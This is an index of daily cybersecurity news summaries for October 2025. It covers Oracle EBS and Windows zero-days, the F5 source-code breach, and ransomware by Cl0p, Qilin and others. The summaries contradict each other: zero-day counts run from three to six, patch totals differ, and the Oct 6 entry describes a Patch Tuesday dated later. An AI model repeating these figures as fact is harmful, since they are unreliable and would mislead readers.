This cybersecurity brief for October 19, 2025, covers major international law enforcement actions, high-profile ransomware claims, and critical vulnerability disclosures. Key events include the dismantling of the 'SIMCARTEL' Cybercrime-as-a-Service platform in Europe, the Everest ransomware group claiming responsibility for the disruptive Collins Aerospace attack, and Microsoft's revocation of over 200 malicious certificates used by the Vanilla Tempest group. Additionally, CISA has issued warnings for two actively exploited Windows zero-day vulnerabilities, and a critical RCE flaw has been patched in Microsoft WSUS.

Oct 18, 2025 (6 articles)

Nation-State Actors Breach F5 Networks Stealing BIG-IP Source Code; AI Phishing Effectiveness Skyrockets

This cybersecurity brief for October 18, 2025, covers a critical supply chain attack against F5 Networks by a nation-state actor, resulting in the theft of BIG-IP source code and unpatched vulnerability data. Other major developments include a Microsoft report revealing AI-powered phishing is 4.5 times more effective, active exploitation of a Cisco zero-day to deploy rootkits, and the Clop ransomware group breaching an American Airlines subsidiary via Oracle EBS flaws. The period also saw rising ransomware attacks targeting healthcare and increased warnings about supply chain security from the UK's NCSC.

Oct 17, 2025 (9 articles)

Microsoft Patches Three Zero-Days, F5 Suffers Nation-State Breach, and Critical Adobe Flaw Actively Exploited

This cybersecurity brief for October 17, 2025, covers a massive Microsoft Patch Tuesday addressing over 172 vulnerabilities, including three actively exploited zero-days. In other major news, F5 Networks disclosed a significant breach by a nation-state actor resulting in source code theft, and CISA issued an urgent warning for a critical, actively exploited Adobe AEM vulnerability with a 10.0 CVSS score. Additional stories include a massive data breach at lending platform Prosper affecting 17.6 million users, a surge in AKIRA ransomware attacks targeting Swiss companies, and new regulatory pressures from a stricter data breach notification law in California.

Oct 16, 2025 (8 articles)

CISA Emergency Directive Issued After F5 Source Code Theft by Nation-State Actor; Microsoft Patches Four Actively Exploited Zero-Days

This cybersecurity brief for October 16, 2025, covers a critical supply chain threat following the theft of F5 source code by a Chinese nation-state actor, prompting a CISA emergency directive. Concurrently, Microsoft's October Patch Tuesday addresses over 170 flaws, including four actively exploited zero-days. Other major events include the disruption of a ransomware campaign using signed malware, the discovery of a Chinese APT targeting a Russian IT firm, a massive data breach affecting two major airlines, and the disclosure of critical flaws in industrial control systems.

Oct 15, 2025 (5 articles)

Microsoft Patches 172 Flaws and Six Zero-Days; F5 Discloses Nation-State Breach Stealing BIG-IP Source Code

This intelligence briefing for October 15, 2025, covers a massive Microsoft Patch Tuesday addressing 172 vulnerabilities, including three actively exploited zero-days. A critical supply chain threat emerges as F5 discloses a long-term breach by a nation-state actor who stole BIG-IP source code, prompting a CISA emergency directive. Other major developments include the return of the LockBit ransomware group with an upgraded version, a surge in overall ransomware attacks, and multiple data breach and vulnerability disclosures affecting companies like Canadian Tire and Fortinet.

Oct 14, 2025 (6 articles)

Microsoft's Massive October Patch Tuesday Fixes 175 Flaws and 3 Zero-Days; F5 Discloses Nation-State Breach

This cybersecurity advisory for October 14, 2025, covers a record-breaking Microsoft Patch Tuesday addressing 175 vulnerabilities, including three actively exploited zero-days. Additionally, F5 disclosed a major breach by a nation-state actor, resulting in the theft of BIG-IP source code and a CISA emergency directive. Other significant events include new campaigns by Chinese APTs Flax Typhoon and Jewelbug, a novel phishing attack abusing NPM infrastructure, and ongoing ransomware activity from the Qilin group.

Oct 13, 2025 (7 articles)

Critical Oracle Zero-Day Exploited by TA505 & Cl0p; Discord Vendor Breach Exposes 70,000 IDs

This cybersecurity brief for October 13, 2025, covers a critical zero-day vulnerability (CVE-2025-61882) in Oracle E-Business Suite being actively exploited by major extortion groups, leading to widespread data theft. Other significant events include a major data breach at a Discord third-party vendor exposing 70,000 user IDs, a novel phishing campaign abusing NPM infrastructure, and a report showing a 30% surge in ransomware attacks against healthcare vendors.

Oct 12, 2025 (8 articles)

Massive Supply Chain Attacks Expose Millions; Clop Ransomware Targets Harvard and Oracle

In the period covering October 12, 2025, the cybersecurity landscape was dominated by large-scale supply chain attacks and aggressive ransomware campaigns. A hacker collective dubbed 'Scattered Lapsus$ Hunters' leaked data for 5.7 million Qantas customers and 7.3 million Vietnam Airlines customers after compromising a shared Salesforce environment. Concurrently, the Clop ransomware gang claimed a breach of Harvard University and was found actively exploiting a zero-day in Oracle E-Business Suite; Oracle also released an emergency patch for a separate, newly discovered high-severity flaw in the same product. Other significant events include the abuse of the Velociraptor DFIR tool to deploy ransomware and reports of North Korean hackers stealing a record $2 billion in crypto assets in 2025.

Oct 11, 2025 (7 articles)

Critical Flaws in Oracle & Redis Under Active Threat; Widespread Supply Chain Attacks Target Developers and Cloud Services

This intelligence briefing for October 11, 2025, covers a series of critical cybersecurity incidents. Major themes include the active exploitation of a zero-day in Oracle E-Business Suite by the Cl0p ransomware group and the patching of a 13-year-old RCE flaw in Redis. Supply chain attacks remain a dominant threat, with malicious npm and Node.js packages targeting developers, and a Discord breach originating from a third-party vendor. SonicWall disclosed two major incidents: active exploitation of its VPNs by Akira ransomware and a full-scale breach of its Cloud Backup service affecting all customers. Additionally, new malware strains like 'Chaosbot' and the AI-powered 'MalTerminal' demonstrate evolving attacker TTPs.

Oct 10, 2025 (8 articles)

Cl0p Exploits Oracle Zero-Day in Massive Extortion Spree; SonicWall Breach Hits All Cloud Backup Users

This cybersecurity brief for October 10, 2025, covers a critical period marked by high-impact zero-day exploitation and significant data breaches. A Cl0p-affiliated group has been exploiting an Oracle E-Business Suite zero-day (CVE-2025-61882) for months, leading to an FBI warning. Concurrently, SonicWall admitted a breach impacted all cloud backup customers, exposing firewall configurations. Other major incidents include the 'CamoLeak' flaw in GitHub Copilot allowing code exfiltration, a supply chain breach at crypto platform Shuffle.com, and the emergence of new ransomware and APT groups.

Oct 9, 2025 (9 articles)

Cl0p Exploits Oracle Zero-Day; Threat Actors Weaponize Legitimate Security Tools in Widespread Attacks

This cybersecurity brief for October 9, 2025, covers a surge in critical threats, led by the Cl0p ransomware gang's exploitation of a zero-day vulnerability (CVE-2025-61882) in Oracle's E-Business Suite. A significant trend this period is the abuse of legitimate tools, with threat actors weaponizing the Velociraptor DFIR tool and exploiting a critical flaw (CVE-2025-10035) in Fortra's GoAnywhere MFT. Other major events include the Qilin ransomware attack on Japanese beverage giant Asahi, a sophisticated phishing campaign targeting marketing professionals, and new guidance from the G7 and UK's NCSC on managing AI risks and a sharp rise in national-level cyberattacks.

Oct 8, 2025 (8 articles)

Salesforce Defies Extortionists After Customer Data Heist; Cl0p Exploits Critical Oracle Zero-Day

This cybersecurity brief for October 8, 2025, covers several critical incidents. A threat actor alliance named 'Scattered LAPSUS$ Hunters' claims to have stolen data from over 40 Salesforce customers via social engineering, though Salesforce itself was not breached and refuses to pay the ransom. Concurrently, the Cl0p ransomware group is actively exploiting a critical zero-day vulnerability (CVE-2025-61882) in Oracle's E-Business Suite. Other major events include a significant data breach at a Red Hat consulting GitLab instance exposing sensitive client data, a ransomware attack by the Qilin group on Japanese beverage giant Asahi, and CISA adding a Zimbra XSS flaw to its KEV catalog.

Oct 7, 2025 (9 articles)

Clop Exploits Oracle Zero-Day; CISA Catalogs Multiple Actively Exploited Flaws

This cybersecurity advisory for October 7, 2025, covers a critical period marked by the active exploitation of a zero-day vulnerability (CVE-2025-61882) in Oracle E-Business Suite by the Clop ransomware group, prompting urgent international warnings. Concurrently, CISA has added several other flaws to its KEV catalog, including vulnerabilities in Microsoft Windows and Zimbra. Other major developments include a new extortion campaign by the 'Scattered Lapsus$ Hunters' collective targeting Salesforce customers, a critical RCE flaw in Redis, and Signal's threat to exit the EU over the proposed 'Chat Control' surveillance bill.

Oct 6, 2025 (10 articles)

Microsoft Patches 3 Zero-Days Under Active Attack; Cl0p, Qilin, and Flax Typhoon Launch Major Campaigns

In the period of October 5-6, 2025, the cybersecurity landscape was dominated by Microsoft's massive October Patch Tuesday, which addressed 175 vulnerabilities including three actively exploited zero-days. Concurrently, major threat actors launched significant campaigns: the Cl0p ransomware group exploited a zero-day in Oracle E-Business Suite for mass extortion, the Qilin gang crippled Asahi Breweries demanding a $10M ransom, and the Chinese APT Flax Typhoon was found using a novel ArcGIS server backdoor for long-term espionage. Other key events include a major escalation in the SonicWall data breach, a novel phishing technique abusing the NPM registry, and new warnings from CISA regarding widespread ICS vulnerabilities.

Oct 5, 2025 (10 articles)